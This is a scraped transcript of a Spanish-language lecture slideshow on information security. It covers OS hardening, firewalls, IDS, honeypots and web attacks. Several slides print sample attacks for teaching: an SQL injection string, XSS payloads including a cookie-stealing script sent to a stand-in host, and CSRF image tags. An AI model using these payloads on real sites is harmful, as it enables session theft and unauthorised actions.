Polticas y Normas - PowerPoint PPT Presentation

Loading...

PPT – Polticas y Normas PowerPoint presentation | free to view - id: 27b19c-Yjg3N



Loading


The Adobe Flash plugin is needed to view this content

Get the plugin now

View by Category
About This Presentation
Title:

Polticas y Normas

Description:

El gran problema de la seguridad: 'Tenemos (mas que suficientes) tecnolog as de ... iptables P FORWARD ACCEPT. iptables t nat P PREROUTING ACCEPT ... – PowerPoint PPT presentation

Number of Views:87
Avg rating:3.0/5.0
Slides: 122
Provided by: juancarlos5
Category:
Tags: fwd | normas | polticas

less

Write a Comment
User Comments (0)
Transcript and Presenter's Notes

Title: Polticas y Normas


1
Políticas y Normas
  • M.C. Juan Carlos Olivares Rojas
  • Septiembre 2009

2
Agenda
  • Seguridad en Sistemas Operativos
  • Seguridad en Redes y Comunicaciones
  • Seguridad en Internet.
  • Autenticación de usuarios
  • Seguridad en Bases de Datos. Validación
  • Antivirus y respaldos

3
Políticas y Normas
  • El gran problema de la seguridad Tenemos (mas
    que suficientes) tecnologías de seguridad, pero
    no sabemos como estamos (en el caso de que lo
    estemos) de seguros.
  • En términos genéricos tenemos mejor calidad de
    vida pero eso no nos garantiza tener seguridad.

4
Políticas y Normas
  • Como se había comentado lo más importantes es
    saber lo que se quiere proteger (políticas y
    normas)
  • Algunos problemas de seguridad en SO
  • Arranque inseguro
  • Quién lo arranca?
  • Es realmente el código original?

5
Seguridad en SO
  • Ejecución insegura
  • Usuarios con muchos privilegios
  • Servicios inútiles y con demasiados privilegios
  • Degradación de la seguridad
  • Integración de nuevo software
  • Dispositivos de almacenamiento masivo
  • Sistema sin parchear
  • Antivirus y Antimalware desactualizados

6
Seguridad en SO
  • Existen diversos enfoques de seguridad. Los más
    comunes son el top-down y el bottom-up.
  • En el enfoque descendente se inicia con las
    aplicaciones hasta llegar al sistema operativo y
    hardware. En el bottom-up que es el más extendido
    el proceso va al revés (primero que nada
    seguridad física).

7
Seguridad en S.O.
  • En general un buen mecanismo de seguridad
    consistirá en un sistema escalonado de permisos
    (similar a las transacciones en dos fases de la
    base de datos).
  • Además del control de acceso a los recursos, el
    sistema operativo debe de llevar la contabilidad
    y la auditoria de las actividades realizadas.
  • Cómo se logra la CIA en un SO?

8
Seguridad en SO
  • La seguridad de las aplicaciones dependen del SO
    anfitrión.

9
Seguridad en S.O.
  • Para alcanzar mayor seguridad el SO tanto como
    las aplicaciones se desarrollan a través de
    diversas arquitecturas de software modulares.
  • Una de las arquitecturas más difundidas es la de
    microkernel. Separando aplicaciones por capas se
    puede garantizar seguridad por aislamiento pero
    hace más vulnerable a los sistemas.

10
Arquitectura de Windows NT
Envinroments Subsystem
Procesos del Sistema
Services
Applications
Windows
OS/2
Session Handler
POSIX
Windows DLLs
System Thread
NTDLL.DLL
System Dispatch System
Windows USER, GDI
(Kernel Mode Interfaceel)
Object Handler
File System Cache
I/O Manager
Plug and Play Manager
Energy Manager
Security Reference Monitor
Virtua Memory
Process and Threads
Local Process Call
Configuration Manager (Registry)
File System and Device Drivers
Grpahical Manager
Kernel
Interfaces de Hardware(buses, Dispositivos de E/S
, interrupcciones, intervalos de temporizadores,
DMA, control de memoria cache , etc.)
Hardware Abstraction Layer (HAL)
11
Seguridad en SO
  • Los sistemas operativos suelen utilizarse en modo
    supervisor del microprocesador para garantizar
    que las aplicaciones causen menos conflictos.
  • Los SO deben de proporcionar APIs a los programas
    de aplicación para garantizar seguridad. Por
    ejemplo GINA (Graphical Identification and
    Autentication ) y algunas criptoAPIs.

12
Seguridad en SO
  • Para el usuario el Sistema es lo que ve y los SOs
    no son la excepción. Generalmente las interfaces
    de usuario en los SO contienen rutinas para
    manipulación de archivos dado que para la mayoría
    de SO (principalmente sistemas X) tienen la
    premisa de que todo es un archivo.

13
Registro
  • BD centralizada que guarda información de
    configuración del sistema. Es seguro?

14
Matriz de Acceso
  • Determina que pueden realizar los usuarios sobre
    los recursos.

15
Integridad de Aplicaciones
16
Cajas de arena
17
Listas de Control de Acceso
  • ACL mecanismos que permiten variar los permisos
    y usuarios sobre los recursos

18
Clasificación de Seguridad
19
Seguridad en Windows NT
  • Manejo de Errores y subsistemas protegidos.
  • NT tolera fallos y estos no afectan a otros
    componentes.
  • Sistema de archivos recuperable.
  • La E/S de disco se ve como una sola transacción.
    Ante fallos vuelve atrás.
  • Soporte para cintas de respaldos.

20
Seguridad en Windows NT
  • Soporte para UPS
  • Espejado de disco.
  • Para que nos sirve hacer particiones en cuestión
    de seguridad?
  • Qué diferencias existen de seguridad entre los
    sistemas de archivos FAT y NTFS?

21
Seguridad en Windows NT
  • Manejo de control de acceso (No existe en FAT?)
  • Sistema de Logging
  • Existe desfragmentación para NTFS?
  • Manejo de comprensión
  • Manejo de cifrado?

22
Seguridad en Windows NT
  • Es sensible a mayúsculas y minúsculas para
    sistemas X e indiferente en DOS y Windows.
  • Los permisos disponibles son
  • Lectura
  • Escritura
  • Ejecución
  • Borrado
  • Cambio de permisos
  • Tomar posesión

23
Seguridad en Windows NT
  • Manejo de Dominios (servicio de directorios) para
    la compartición y uso de recursos.
  • Los dominios pueden estar en un solo servidor o
    distribuidos por la red. La redundancia de datos
    es seguridad?
  • Los datos sobre los usuarios se guardan en una
    base de datos llamada SAM (disponible en
    cualquier servidor).

24
Seguridad en Windows NT
  • La seguridad se hace a través de políticas y
    directivas de seguridad. Por ejemplo el sistema
    de autenticación valida la longitud, duración de
    la contraseña y el número de intentos.
  • Dónde se ve la auditoria del SO? Visor de
    Eventos (Sucesos)y tiene tres vriantes sistema,
    seguridad y aplicación.

25
Seguridad en Windows NT
  • A partir de Windows Vista se posee Trusted
    Platform Module (TPM) v1.2 Hardware integrado en
    el equipo. El cual almacena credenciales en un
    chip en la tarjeta madre.
  • Todo el código de las DLLs y ejecutables se
    firman digitalmente para garantizar la integridad
    del código.

26
Seguridad en Windows NT
  • La mayoría de los sistemas operativos manejan una
    política predeterminada de no permitir el acceso
    a nada. Un control en este sentido es la variable
    de candado para realizar operaciones de
    modificación.
  • Las aplicaciones pueden ejecutarse en diversos
    contextos como Internet Explorer 7 que puede
    ejecutarse en modo protegido.

27
Seguridad en Windows NT
  • Los SOs actuales poseen de firewalls para
    proteger los activos de información de una
    computadora.
  • El firewall actual de Windows es tanto de entrada
    como de salida.
  • Los SOs actuales cuanten con antimalware (no es
    una solución completa a un antivirus, es más
    amplia) que eliminan periódicamente ciertas
    anomalías.

28
Seguridad en Windows NT
  • Los SOs actuales con un sistema de administración
    de reinicios capaz de dejar el sistema tal cual
    se quedó después de una falla.

29
Seguridad en el Desarrollo de Software
  • Hasta hace poco muy pocas metodologías de
    desarrollo de software consideraban a la
    seguridad como un requerimiento básico de
    calidad.
  • La tendencia ha cambiado bastante a tal punto que
    existen metodologías como SDL (Microsoft) que
    manejan roles y procesos de seguridad.

30
Seguridad en Desarrollo de Sw
  • La parte más importante de la seguridad es
    considerarlo como un requerimiento obligatorio
    (implícito) a como actualmente son las
    validaciones de entrada.
  • Parte importante de la seguridad se puede ver
    desde diferentes enfoques en cada parte del
    proceso de desarrollo (análisis, diseño,
    implementación, pruebas, etc.) pero siempre es
    importante las arquitecturas de del software con
    respecto a la seguridad.

31
Código y poder
  • El código fuente es poder
  • Tanto para defenderse como para atacar
  • Compartir el código es compartir el poder.
  • Con los atacantes y defensores
  • Publicar el código fuente sin hacer nada más
    degrada la seguridad
  • Por el contrario, publicar el código fuente
    permite a los defensores y a otros elevar la
    seguridad al nivel que les convenga.

32
Software Seguro
  • El software Fiable es aquel que hace lo que se
    supone que debe hacer.
  • El software Seguro es aquel que hace lo que se
    supone que debe hacer, y nada mas.
  • Son los sorprendentes algo mas los que producen
    inseguridad.
  • Para estar seguro, debes de ejecutar solo
    software perfecto -)
  • O, hacer algo para mitigar ese algo mas

33
El problema M M
The MM Problem
Interior Suave El problema adicional que hay que
resolver
Cubierta Dura Resuelto por seguridad perimetral
34
Arquitectura Fortaleza
  • Protección perimetral
  • Estático, no diferenciado
  • Difícil de modificar y adaptar
  • Descuida el insider problem

35
Arquitectura Aeropuerto
  • Mayor flexibilidad
  • Múltiples zonas de seguridad basadas en roles
  • Protecciones multinivel interzonas
  • Colección jerárquica de fortalezas interactuantes

36
Arquitectura Aeropuerto
37
Arquitectura P2P
  • Conceptos dinámicos de confianza, autenticación y
    autorización
  • Requerimientos comerciales-gtRequerimientos
    tecnológicos
  • Inferir en tiempo real qué quiero hacer y con
    quién quiero hacerlo
  • Puede requerir servicios provistos por TTP
    (Trusted Third Parties).

38
Arquitectura SD3
  • Propuesta por Microsoft en SDL

39
Consejos de Seguridad
  • Tenga en cuenta la seguridad
  • Al comienzo del proceso
  • Durante el desarrollo
  • Durante la implementación
  • En los hitos de revisión del software
  • No deje de buscar errores de seguridad hasta el
    final del proceso de desarrollo

40
Los retos de la seguridad en las empresas
Recursos limitados para implementar soluciones de
seguridad
Servidores con roles múltiples y variados
Amenazas internas o accidentales
Sistemas obsoletos
Falta de expertos en seguridad
Consecuencias legales
El acceso físico rompe muchas medidas de seguridad
41
Defensa en Profundidad
  • Usando una estrategia por capas
  • Se incrementa el riesgo de ser detectado para el
    atacante
  • Se reduce su probabilidad de tener éxito

Políticas, Procesos y Concienciación
Seguridad Física
Datos
ACLs, cifrado, EFS
Aplicación
Fortificación, antivirus
Fortificación del SO, Autenticación, Parches
Host
Red Interna
Segmentos de Red, IPSec
Firewalls, Acceso a Red, Redes de Cuarentena
Perímetro
Guardias, Cerraduras, etc.
Documentación, formación
42
Consejos de Seguridad
  • Programar bien!!!
  • No utilizar funciones inseguras que puedan
    provocar fallos de desbordamiento.
  • En C/C se debe tener mucho cuidado con los
    punteros
  • Se recomienda no utilizar funciones como
    strcpy() strcat() sprintf() scanf()sscanf()
    fscanf() vfscanf(), entre otras.

43
Un error frecuente
  • Nunca debe asumirse que establecer seguridad
    perimetral es todo lo que debe hacerse
  • Los Firewalls pueden ser comprometidos
  • Algunos puertos estarán abiertos para la
    comunicación con el exterior y los ataques se
    harán, sobre todo, contra ellos
  • Los ataques pueden ser lanzados internamente, y
    las estadísticas dicen que eso será lo más
    probable

44
Fortificación
  • El hardening (fortificación o endurecimiento)
    es una técnica de control de seguridad que
    consiste en tomar medidas elevadas de seguridad
    en los servidores o equipos de usuarios.
  • No existe un conjunto de pasos únicos, esto se
    maneja de forma variada, dependiendo del SO y de
    los servicios disponibles aunque generalmente
    existen directrices y líneas base que se pueden
    seguir.

45
Fortificación
  • Revisa que servicios se deben de ejecutar.
  • Revisa el grado de seguridad continuamente.
  • Manejar distintos tipos de restricciones.
  • Utiliza certificaciones como common criteria.

46
Fortificando Apache
  • Deshabilitar servicios no indispensables
  • Verificar los bugtracks y actualizar
  • Proteger los directorios /var/www/
  • Crear un directorio personalizado /var/www/error
  • Habilitar los .htaccess y proteger los archivos
    de users y password del http

47
mod_dosevasive
  • Fácil de configurar
  • Puede ayudar a evadir ataques de DoS bloqueando
    direcciones ip o URLs temporalmente.

LoadModule dosevasive20_module modules/mod_dosevas
ive20.so ltIfModule mod_dosevasive20.cgt
DOSHashTableSize 3097 DOSPageCount 2
DOSPageInterval 1 DOSSiteCount 50
DOSSiteInterval 1 DOSBlockingPeriod 10
DOSEmailNotify admin_at_domain.com DOSLogDir
"/tmp/mod_dosevasive (make writable by apache
only) lt/IfModulegt
48
Características mod_security
  • Los filtros se aplican antes de ejecutar los
    scripts
  • Soporta SSL
  • Entienden el protocolo http
  • Hace logging completo incluyendo post data
  • Las reglas son personalizadas usando expresiones
    regulares y pueden ser aplicadas a niveles de
    virtual hosts

49
Oscurantismo
  • Es un mecanismo de seguridad que consiste en
    ocultar información y servicios.
  • Un servidor Web se ejecuta en el puerto 80 pero
    puede cambiarse de puerto. Esto garantiza cierta
    seguridad hasta que no se descubra el servicio.
  • El código abierto es un ejemplo claro que el
    oscurantismo no funciona.

50
Oscurantism0
  • NO SE DEBEN DE UTILIZAR NUNCA CONFIGURACIONES
    PREDETERMINADAS.
  • Se deben cambiar las configuraciones
    predeterminadas de forma robusta antes de entrar
    a la red.
  • El conocimiento de configuraciones
    predeterminadas es un vector ataque muy utilizado.

51
Seguridad en Redes y Comunicaciones
  • Uno de los activos de información más importantes
    dentro de las organizaciones es la
    infraestructura de telecomunicaciones tanto de
    datos como de voz.
  • A través de las redes de voz y datos fluye toda
    la información de la empresa, si esta no está
    disponible, es confiable e integra se tendrá una
    serie de problemas.

52
Seguridad en Red
  • Lo primero que se debe de hacer es la evaluación
    del desempeño y seguridad de la red.
  • En redes de computadoras interesa que tengan una
    alta disponibilidad con un buen uso del ancho de
    banda. Por este motivo se necesita monitorear la
    red con software especializado como nagios,
    cactis, mrtg, entre otros.

53
Seguridad en Red
  • Las herramientas de monitoreo tienen la
    característica de notificar lo que está
    ocurriendo en tiempo real.
  • Se suele confundir comúnmente con los sniffers y
    analizadores de protocolos dado que realizan en
    esencia la misma función básica de capturar
    paquetes en la red.
  • El desempeño de la red está dado por los
    protocolos de comunicación empleados.

54
Seguridad en Red
  • La seguridad de la red parte desde la capa 0 o
    Cableado estructurado, pasando por la capa física
    y enlace (NICs), el SO (capa de red, transporte,
    sesión, presentación) y de las aplicaciones de
    red.
  • Se puede utilizar la segmentación de redes y el
    manejo de hardware especializado para un mejor
    desempeño y seguridad de la red.
  • Las aplicaciones de red son quizás la parte de
    seguridad más importante.

55
Seguridad en Redes
  • En cuestión de las aplicaciones se necesita hacer
    un análisis de que se comparte, cómo se comparte
    y hacia quien se comparte. Con estas
    características se puede mejorar la seguridad de
    la red.
  • Para asegurarse que los controles implantados
    sean los correctos es necesario evaluarlos
    haciendo hacking ético.

56
Seguridad en Redes
  • El hacking ético consiste en la enumeración de
    propiedades de un sistema como puertos,
    aplicaciones abiertas, tipo de sistema operativo,
    etc.
  • Con toda esta información el ataque debe preparar
    un plan de ataque. Para ello puede auxiliarse de
    herramientas de código malicioso como virus,
    exploits, rootkits, sniffers, password crackers,
    etc. La herramienta dependerá de lo que se
    pretende atacar (vector de ataque).

57
Seguridad en Redes
  • Para este curso se propone un esquema de
    seguridad en tres fases
  • Prevención de Intrusos (IPS).
  • Detección de Intrusos (IDS)
  • Engaño de usuarios (Honeywall)
  • Retroalimentación (fortificacion de activos)

58
Seguridad en Redes
  • Tarea próximo sábado mostrar evaluación de la
    seguridad de redes (análisis de vulnerabilidades
    vía software) que servirá de indicadores meta. Se
    deberá indicar con que controles de seguridad se
    cuentan.
  • Examen se realizarán equipos de dos personas
    para escoger uno de los temas, se deberá exponer
    la instalación de la herramienta, como se usa y
    demostrar de forma práctica y presencial que
    mejora la seguridad.

59
Seguridad en Redes
  • El examen será el día 7 de noviembre. Se deberá
    tener un escenario de cómo estaba antes la
    seguridad sin el control implementado.
  • Se evaluará que el control esté correctamente
    implementado (80), y 20 la presentación
    (documento de instalación y configuración tratar
    de no dejar configuración por default-). El
    examen vale el 70 del parcial.

60
IPS
  • Los sistemas de prevención de intrusos más
    famosos son los firewalls.
  • Un firewall es un dispositivo que filtra el
    tráfico de la redes. Puede ser un dispositivo
    físico o un software sobre un sistema operativo.
  • Existen dos tipos de firewall de host y de red.
    Cuando es de host se instala un software en el
    sistema operativo (o ya viene instalado).

61
IPS
  • Cuando se trata de un firewall de red puede ser
    un hardware especializado o una computadora
    adaptada con dos o más interfaces de red.
  • El firewall se encarga de determinar en base a
    políticas de acceso que paquetes deben de entrar
    y de salir de la red.
  • En general se filtran paquetes por IP, Puerto y
    contenido (especializados).

62
IPS
  • Los firewall funcionan como barda perimetral
    permitiendo el acceso o denegándolo a los datos
    de las aplicaciones.
  • El análisis de contenido de un firewall tiene la
    característica que es altamente consumidor de
    tiempo y no puede ser del todo efectivo. Por
    ejemplo en HTTP se sugiere utilizar un
    proxy-cache.

63
IPS
  • Lo más importante es la creación de un esquema o
    arquitectura que permita manejar seguridad de
    forma eficiente. Existen diversas arquitecturas
    para configurar firewall.
  • Entre más puntos de control se tengan mejor es la
    seguridad pero el desempeño de la red puede no
    ser el óptimo.

64
Arquitecturas de IPS
  • Centralizada
  • Zona desmilitarizada

65
Arquitecturas de IPS
  • DMZ con dos firewalls
  • Las arquitecturas de IPS varían dependiendo de la
    topología de la red y de la prioridad de los
    activos de información.

66
IPS
  • Existen un sin fin de herramientas de firewalls.
  • Las más comunes so a través del sistema operativo
    como IPTables en el caso de los sistemas Linux y
    las soluciones de hardware.

67
IP Table
  • !/bin/sh
  • SCRIPT de IPTABLES - ejemplo del manual de
    iptables
  • echo -n Aplicando Reglas de Firewall
  • FLUSH de reglas
  • iptables -F
  • iptables -X
  • iptables -Z
  • iptables -t nat -F
  • Establecemos politica por defecto
  • iptables -P INPUT ACCEPT
  • iptables -P OUTPUT ACCEPT
  • iptables -P FORWARD ACCEPT
  • iptables -t nat -P PREROUTING ACCEPT
  • iptables -t nat -P POSTROUTING ACCEPT

68
IP Table
  • Empezamos a filtrar
  • El localhost se deja (por ejemplo conexiones
    locales a mysql)
  • /sbin/iptables -A INPUT -i lo -j ACCEPT
  • A nuestra IP le dejamos todo
  • iptables -A INPUT -s 195.65.34.234 -j ACCEPT
  • A un diseñador le dejamos usar el FTP
  • iptables -A INPUT -s 80.37.45.194 -p tcp -dport
    2021 -j ACCEPT
  • El puerto 80 de www debe estar abierto, es un
    servidor web.
  • iptables -A INPUT -p tcp --dport 80 -j ACCEPT
  • iptables -A INPUT -p tcp --dport 11024
  • iptables -A INPUT -p udp --dport 11024

69
Configuración IP Table
  • Cerramos otros puertos que estan abiertos
  • iptables -A INPUT -p tcp --dport 3306 -j DROP
  • iptables -A INPUT -p tcp --dport 10000 -j DROP
  • iptables -A INPUT -p udp --dport 10000 -j DROP
  • echo " OK . Verifique que lo que se aplica con
    iptables -L -n"
  • Fin del script.

70
IDS
  • Los IDS son sistemas que monitorea diversas
    fuentes y formas los SI.
  • Compara el tráfico con patrones de ataques.
  • Identifica problemas relacionados con el abuso de
    privilegios
  • Realiza análisis estadístico en busca de patrones
    de actividad anormal

71
IDS
  • Por qué utilizar un IDS si ya se cuenta con un
    IPS?
  • Esta es la pregunta que casi todo administrador
    de red y encargados de seguridad se hacen.
  • El firewall como se había comentado es una
    especie de barda, los IDS viene siendo el sistema
    de monitoreo de circuito cerrado.

72
IDS
  • En muchas ocasiones el principal enemigo ya está
    dentro.
  • Muchas herramientas de seguridad basadas en
    hardware generalmente ya incluyen características
    de IDS pero siguen llamándose firewalls.
  • Además el IDS puede detectar ataques por
    entunelamiento,de vulnerabilidades de
    aplicaciones y de la parte segura de la red.

73
IDS
  • Los IDS pueden ser a nivel de Host (HIDS) siendo
    quizás los más populares y a nivel de red (NIDS).
  • Los NIDS monitorean el tráfico de la red
    mostrando alertas sobre ciertas anomalías.
  • Los HIDS sólo se preocupan por los eventos
    locales a una máquina monitoreando el tráfico de
    red o elementos de la misma máquina

74
IDS
  • Los HIDS Monitorean
  • Sesiones de usuarios
  • Actividades de los usuarios privilegiados
  • Cambios en el sistema de archivos
  • A pesar de las múltiples ventajas, los IDS
    presentan algunos inconvenientes como
  • Generación de falsos positivos
  • No pueden analizar tráfico cifrado

75
IDS
  • Son tan efectivos como la última actualización de
    patrones.
  • Alta latencia entre el ataque y la notificación
  • Dificultad para realizar análisis en redes
    congestionadas
  • No indican si un ataque ha sido exitoso o no

76
IDS
  • No son infalibles
  • No compensan una mala administración
  • No investigan ataques sin intervención humana
  • No intuyen ni siguen las políticas de seguridad
    organizacional

77
IDS
  • Los IDS es un control de seguridad que está
    siendo implementado actualmente con mucha
    frecuencias en las organizaciones.
  • Como toda herramienta tecnológica depende en gran
    medida de la persona que se encargue de la toma
    de decisiones.
  • Los IDS más populares son snort y tripwire.

78
IDS
  • Los IDS definen reglas de advertencia muy similar
    a las reglas de prevención de un IPS. Aquí la
    semántica cambia dado que si se cumplen dichas
    reglas se trata de un ataque.
  • Ya existen base de datos con firmas que contienen
    la caracterización de ataques comunes a servicios
    generales.

79
Honeywall
  • La detección de intrusos puede ser mejorada a
    través de máquinas denominadas señuelo o bastión
    que permiten proteger los demás activos de
    información entreteniendo al atacante.
  • Cuando se trata de un host individual se le llama
    honeypot y cuando se habla de un conjunto de
    máquinas recibe el nombre de honeynet.

80
Honeywall
  • Tener máquinas de carnada tiene un costo alto que
    pagar. Formalmente los honeywall son equipos
    simulados que permiten garantizar una protección
    adicional.
  • Últimamente se han vuelto populares por el uso
    masivo de virtualización en todos los entornos.
  • El software existente cada vez es más sencillo de
    manejar.

81
Honeywall
  • Pocas empresas garantizan este nivel de
    seguridad. Generalmente se enfocan a IPS después
    a IDS y hasta al último estas soluciones.
  • El equipo o red atacada debe de ser monitorizada
    constantemente para tomar acciones de defensa.
  • Algunas implementaciones son honeyd, honeycomb,
    sebek entre otras.

82
Seguridad en Internet
  • El acceso a redes externas y públicas como
    Internet hace que la comunicación sea aun más
    insegura.
  • Se deben tomar las mismas precauciones que en la
    red local sólo se debe de considerar que
    servicios se proveen y como es que deben de ser
    provistos.

83
Inyección de código SQL
  • Es un ejemplo claro tanto de seguridad en
    Internet (Web), seguridad en el desarrollo de
    aplicaciones (lenguajes dinámicos en el lado del
    servidor como PHP, JSP, ASP) y bases de datos
    (como mysql y SQL Server).
  • Estos tipos de ataques se deben a algunas de las
    bondades de SQL ejecución de varios comandos en
    una sola instrucción, embeber comentarios,
    realizar consultas de metadatos y shellscripts.

84
Inyección de código SQL
  • Estos ataques se derivan de validaciones
    incorrectas de datos de un formulario que sirven
    de punto de entrada para los scripts dinámicos de
    consultas de datos.
  • Por ejemplo la instrucción SELECT FROM login
    WHERE usuariofulantio OR 11 -- AND
    password
  • Es correcta. Pudiendo entrar a un sistema o bien
    mostrando datos.

85
Inyección de SQL
  • Cómo se pueden securizar las aplicaciones Web
    que manejan consultas a bases de datos?
  • Validar datos del usuario entre menos escriba
    mejor.
  • No utilizar sentencias SQL construidas
    dinámicamente (manejar consultas preparadas
    -Preparament Statement-)

86
Inyección de SQL
  • No utilizar cuentas de usuarios privilegiados.
  • No proporcionar mayor información que la
    necesaria.
  • Al momento de validar campos eliminar caracteres
    como comillas sencillas.

87
Seguridad en WebApps
Red
Router Firewall Switch
Servidor
Parches ServiciosProtocolos
Cuentas Archivos y Directorios Compartidos
Puertos Registro Auditoría y Logging
88
XSS
  • XSS (Cross Site Scripting) es una vulnerabilidad
    que permite al hacker ejecutar código script en
    un cliente web.
  • Dos entradas principales
  • Contempladas (foros, emails, librerías)
  • Ocultas (querystring, campos HTML)
  • Impactos
  • Modificación del contenido
  • Envío de información
  • Robo de sesión

89
XSS
  • Tipos de XSS
  • Nivel 0 Local ó basada en DOM Un script local
    accede a parámetros request de la URL y los
    utiliza para construir código script.
  • Nivel 1 No Persistente ó Reflejada
  • Se utilizan los datos de entrada de formularios
    para construir scripts, permitiendo la inyección
    de código.

90
XSS
  • Nivel 2 Persistente ó Segundo Orden
  • Es la más poderosa. Los datos se almacenan en una
    bd y posteriormente se muestran a los usuarios,
    inyectando el código continuamente.
  • Tampering cambio de valores en parámetros
    ocultos para realizar un ataque al sistema.

91
XSS
  • Ejemplo de XSS Nivel 0
  • Link Original
  • www.example.com/login.aspx?userangel
  • Link Malicioso
  • www.example.com/login.aspx?userltscriptgtalert(sor
    presa')lt/scriptgt

92
XSS
  • Aparentemente esto no es perjudicial (no pasa de
    ser una broma), que pasaría si
  • ltscriptgt
  • document.location 'http//maligno.ejemplo.org/ro
    ba_cookies.php?cookies' document.cookie
  • lt/scriptgt
  • Otra variante de ataques es el CSRF

93
CSRF
  • CSRF (Cross Site Reference Forgery) consiste en
    hacer que una aplicación ejecute una acción
    creyendo que la hizo un usuario. La peligrosidad
    de este tipo de ataque es bastante alta dado que
    permite el control de una sesión de forma remota.
  • Vectores de ataque comunes
  • ltimg srchttp//www.ilike.com/backend?addSong9988
    22gt
  • ltimg srchttp//foro.com/borrar.php?foro1gt

94
CSRF
  • Soluciones
  • clave aleatoria, que solo es válida una vez.
  • Se debe enviar en cada petición hecha.
  • Se debe invalidar despues de usarse.
  • Ejemplo http//hi5.com/friend/mail/deleteMail.do?
    msgId1senderId2offset0timestampNONCE
  • Mitos
  • Checar el referrer te protege de CSRF.
  • Recibir info por POST te protege.

95
Seguridad en WebApps
  • Reglas básicas
  • No confies en lo que lees.
  • No confies en lo que vas a escribir.
  • No confies en lo que quieres modificar.

96
Autenticación de usuarios
  • Los usuarios deben de validarse por diversos
    medios.
  • La autenticación de los usuarios debe de
    manejarse preferentemente de forma independiente
    de las aplicaciones y activos de información.
  • Más que autentificar usuarios se debe de proteger
    los activos de información.

97
Seguridad en Bases de Datos. Validación
  • Los datos almacenados deben de poderse asegurar
    de forma robusta ya que su contenido es lo que
    generalmente da valor a las organizaciones.
  • Una parte importante del proceso de aseguramiento
    de base de datos es el proceso de validación, un
    gran porcentaje de errores puede reducirse
    significativamente si se validan las entradas.

98
Seguridad en BD
Almacenamiento
Datos de Entrada
Monitoreo
Control de Acceso
Datos de Salida
99
Seguridad en BD
Robo
Modificación de Datos
500.00
50,000
Desviación de Datos
100
Seguridad en BD
  • Es importante definir permisos (ACL) a los
    recursos.
  • Cifrado de datos (problema del almacenamiento de
    contraseñas).
  • Existen ya algunas preguntas claves que se pueden
    utilizar para indicar el grado de seguridad que
    tiene algún activo de información. A continuación
    se muestran algunas de ellas para BD.

101
Seguridad en BD
  • Cuál es la plataforma sobre la que esta
    construida la base de datos?
  • La base de datos brinda herramientas para la
    seguridad de los datos?
  • El equipo (Humano) de trabajo posee los
    conocimientos suficientes para encontrar
    mecanismos alternos de seguridad?

102
Seguridad en BD
  • La base de datos trabaja en un entorno
    multiusuario?
  • Qué personas del equipo deberían tener acceso a
    la base de datos?
  • Todas las personas del equipo de trabajo
    deberían tener acceso a la totalidad de los datos
    de la base?

103
Seguridad en BD
  • La base de datos funciona en un entorno
    distribuido?
  • La ubicación de los archivos de base de datos es
    la adecuada?
  • Existen políticas adecuadas para la asignación
    de usuarios?
  • Existen políticas adecuadas para validar la
    complejidad de las contraseñas?

104
Seguridad en BD
  • El personal técnico esta al tanto de las nuevas
    modalidades ilegales de extracción de
    conocimiento?
  • Se cuenta con un Firewall dentro de la red?
  • Se registra de manera permanente y sistemática
    el acceso a los datos incluyendo la persona,
    fecha y motivo de acceso?

105
Seguridad de los Datos
  • La información se captura de la manera adecuada?
  • La información se captura en los tiempos
    estipulados y/o adecuados?
  • El personal que captura los datos, es idóneo
    para hacerlo?
  • Se realiza una precrítica de los datos
    capturados?

106
Seguridad en los Datos
  • Qué información se debe publicar?
  • Quiénes deben publicar la información?
  • Se especifica si el dato publicado es parcial o
    definitivo?
  • En caso de existir un error en la captura del
    dato, Se repara inmediatamente?

107
Seguridad en los Datos
  • Se tiene especial cuidado con las normas de
    ortografía para la captura del dato?
  • Existe documentación escrita sobre la ubicación
    de cada una de las bases de datos utilizadas?
  • Están adecuadamente configurados los perfiles de
    acceso a cada base de datos?

108
Seguridad en los Datos
  • Se realizan backups de la base de datos de
    manera permanente y sistemática?
  • Existen protocolos para la realización de
    backups?
  • Es claro para el personal técnico que NINGUNA
    base de datos debe ser eliminada de un recurso
    computacional antes de realizar un backup sobre
    la misma?

109
Seguridad en BD
  • En general los esquemas de modelo de BD no
    incluyen el aspecto de seguridad.

SSN
Function
Date
Title
Name
Is Assigned to
Subject
Employee
Project
(0,N)
(0,M)
Dep
Client
Salary
Title
SSN
110
Fortificación de BD
  • Principio de menor privilegio (creación de
    vistas).
  • Actualización constante de parches
  • Eliminar o deshabilitar cuentas predeterminadas.
  • Correr procesos del manejador de BD con cuentas
    no privilegiadas.

111
Fortificación de BD
  • Deshabilitar componentes no necesarios
  • Utilizar procedimientos almacenados así como
    disparadores.

112
Modelo NTK(need to know)
  • Se subdividen los datos en compartimientos
  • Cada sujeto S tiene un un conjunto de
    compartimientos que necesita conocer NTK(S)
  • Cada objeto O consta de un conjunto de
    compartimientos comp(O)
  • Un sujeto S tiene acceso de lectura a O si
    comp(O) Í NTK(S)
  • S puede escribir O si NTK(S) Í comp(O)

113
Modelo Biba
  • Busca mantener la integridad de los datos.
    Sujetos y objetos se clasifican por niveles de
    integridad. Los datos son modificados solo por
    quienes tienen mayor integridad que los datos
    mismos.
  • S puede modificar O, si I(S) gt I(O)
  • Si S puede leer O, S puede escribir P solo si
    I(O) gt I(P).

114
Antivirus y respaldos
  • Se recomienda realizar respaldos periódicos de
    preferencia a nivel de bits de cada uno de los
    activos de información.
  • Los respaldos deben de hacerse completos e
    incrementales.
  • Los programas antivirus deben actualizarse
    frecuentemente, deben de validar cualquier tipo
    de código malicioso.

115
Referencias
  • Date, C. (2001) Introducción a los Sistemas de
    Bases de Datos, Séptima edición, Capítulo 16
    Seguridad, Pearson Educación, pp. 504-536.
  • McPherson, F. (2005), Pocket PC a su Alcance,
    3ra. Edición, McGraw-Hill, México, 2005, ISBN
    970-10-4731-1.

116
Referencias
  • Elmasri, R. y Navathe S. (2000) Sistemas de Bases
    de Datos, 2da. Edición. Capítulo 20 Seguridad,
    Addison-Wesley 200, México, pp. 599-613, ISBN
    968-444-399-4.
  • Tanenbaum, A. y Van Steen, M. (2007). Distributed
    Systems. Principles and Paradigms, Segunda
    edición, Capítulo 9 Seguridad, Pearson Education,
    Estados Unidos, pp. 377-442, ISBN 0-13-239227-5.

117
Referencias
  • Guerrero, R. (2008). Proyecto de Comunicación
    Telefónica VoIP en Gobierno del Estado de
    Michoacán, Tesina de Titulación.
  • Watters, P (2005) Solaris 10 The Complete
    Reference, McGraw-Hill Osborne, Estados Unidos,
    ISBN 0-07-222998-5.

118
Referencias
  • Coulouris, G., Dollimore, J. y Kindberg, T.
    (2001). Sistemas Distribuidos, Capítulo 7
